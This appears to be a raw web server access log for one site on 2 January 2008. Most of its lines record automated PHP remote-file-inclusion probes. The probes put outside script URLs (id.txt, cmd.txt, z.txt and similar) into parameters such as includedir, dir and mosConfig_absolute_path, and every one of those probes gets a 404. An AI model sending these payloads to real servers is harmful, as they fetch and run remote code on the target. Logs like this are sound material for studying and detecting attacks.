209.123.207.130 - - [02/Jan/2008:07:08:27 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [02/Jan/2008:07:08:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.123.207.130 - - [02/Jan/2008:07:08:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:07:09:21 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:09:25 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:09:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:09:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.193.22 - - [02/Jan/2008:07:10:54 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.22 - - [02/Jan/2008:07:11:03 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:11:07 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:11:07 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:11:07 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.22 - - [02/Jan/2008:07:11:15 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:12:17 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:12:18 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:12:18 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:07:13:04 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:07:13:04 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:13:17 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:13:17 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:13:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:13:30 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:13:30 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:13:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:13:46 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:13:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:13:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:14:32 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:14:32 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:14:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.36.149.218 - - [02/Jan/2008:07:14:33 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:14:33 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:14:33 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:14:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:15:14 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [02/Jan/2008:07:15:14 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:17:23 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [02/Jan/2008:07:17:23 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.163 - - [02/Jan/2008:07:18:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [02/Jan/2008:07:18:11 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.75.193.22 - - [02/Jan/2008:07:20:11 -0800] "GET /config.php?path_to_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.22 - - [02/Jan/2008:07:20:28 -0800] "GET /logs/config.php?path_to_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.22 - - [02/Jan/2008:07:20:51 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:07:21:52 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:07:21:53 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:07:21:53 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:07:23:15 -0800] "GET /mobileoffice/?M=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.203 - - [02/Jan/2008:07:27:02 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:07:27:24 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:07:27:24 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.244.66 - - [02/Jan/2008:07:31:08 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [02/Jan/2008:07:31:09 -0800] "GET //skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [02/Jan/2008:07:31:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [02/Jan/2008:07:34:08 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.241 - - [02/Jan/2008:07:38:01 -0800] "GET /minamijewelry/html/images/flower_character.jpg HTTP/1.1" 200 3451 "-" "Googlebot-Image/1.0" "www.dmulk.com"
208.76.110.169 - - [02/Jan/2008:07:38:36 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [02/Jan/2008:07:38:37 -0800] "GET //skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [02/Jan/2008:07:38:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [02/Jan/2008:07:42:03 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:07:42:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:07:48:40 -0800] "GET /retreat1/IMG_2700.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
124.0.73.2 - - [02/Jan/2008:07:49:07 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [02/Jan/2008:07:49:07 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:07:49:15 -0800] "GET /retreat1/IMG_2680.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
122.153.194.3 - - [02/Jan/2008:07:51:00 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.194.3 - - [02/Jan/2008:07:51:01 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.194.3 - - [02/Jan/2008:07:51:01 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:07:51:23 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.203.64.246 - - [02/Jan/2008:07:52:12 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.203.64.246 - - [02/Jan/2008:07:52:13 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.203.64.246 - - [02/Jan/2008:07:52:13 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.35.196.104 - - [02/Jan/2008:07:55:43 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.104 - - [02/Jan/2008:07:55:43 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.104 - - [02/Jan/2008:07:55:43 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.229 - - [02/Jan/2008:07:57:29 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.229 - - [02/Jan/2008:07:57:29 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.229 - - [02/Jan/2008:07:57:30 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.100.218 - - [02/Jan/2008:07:59:16 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.100.218 - - [02/Jan/2008:07:59:16 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.100.218 - - [02/Jan/2008:07:59:16 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [02/Jan/2008:07:59:24 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [02/Jan/2008:07:59:25 -0800] "GET /skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [02/Jan/2008:07:59:25 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.118.142.88 - - [02/Jan/2008:08:01:04 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.118.142.88 - - [02/Jan/2008:08:01:04 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.118.142.88 - - [02/Jan/2008:08:01:05 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.15 - - [02/Jan/2008:08:01:50 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.51.87.246 - - [02/Jan/2008:08:03:38 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [02/Jan/2008:08:03:38 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [02/Jan/2008:08:03:38 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.20.52 - - [02/Jan/2008:08:06:24 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.20.52 - - [02/Jan/2008:08:06:25 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.20.52 - - [02/Jan/2008:08:06:25 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.43.36.234 - - [02/Jan/2008:08:07:47 -0800] "GET /index.php?option=com_saltencrypter&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.43.36.234 - - [02/Jan/2008:08:07:50 -0800] "GET /logs/index.php?option=com_saltencrypter&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
203.116.91.37 - - [02/Jan/2008:08:08:07 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.37 - - [02/Jan/2008:08:08:08 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.116.91.37 - - [02/Jan/2008:08:08:08 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:09:14 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:09:15 -0800] "GET //skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:09:15 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:09:57 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:09:57 -0800] "GET //skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:09:57 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.30.100 - - [02/Jan/2008:08:10:50 -0800] "GET /index.php?option=com_saltencrypter&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.61.30.100 - - [02/Jan/2008:08:10:50 -0800] "GET /logs/index.php?option=com_saltencrypter&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:13:11 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [02/Jan/2008:08:13:17 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.67.238.88 - - [02/Jan/2008:08:16:34 -0800] "GET /logs/access_071222.log/mvcw_conver.php?step=1&vwar_root=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [02/Jan/2008:08:16:34 -0800] "GET /mvcw_conver.php?step=1&vwar_root=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.67.238.88 - - [02/Jan/2008:08:16:34 -0800] "GET /logs/mvcw_conver.php?step=1&vwar_root=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.122 - - [02/Jan/2008:08:16:36 -0800] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.67.238.88 - - [02/Jan/2008:08:18:09 -0800] "GET /logs/access_071127.log/mvcw_conver.php?step=1&vwar_root=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.104 - - [02/Jan/2008:08:18:56 -0800] "GET /index.php?fn=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.27.203.44 - - [02/Jan/2008:08:20:10 -0800] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [02/Jan/2008:08:20:10 -0800] "GET /skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.27.203.44 - - [02/Jan/2008:08:20:11 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.15.59 - - [02/Jan/2008:08:22:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.freewebtown.com/aldirianto/tikam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:08:22:51 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [02/Jan/2008:08:22:52 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.37 - - [02/Jan/2008:08:23:09 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.107 - - [02/Jan/2008:08:23:53 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.110.81.46 - - [02/Jan/2008:08:30:28 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.110.81.46 - - [02/Jan/2008:08:30:32 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.110.81.46 - - [02/Jan/2008:08:30:34 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
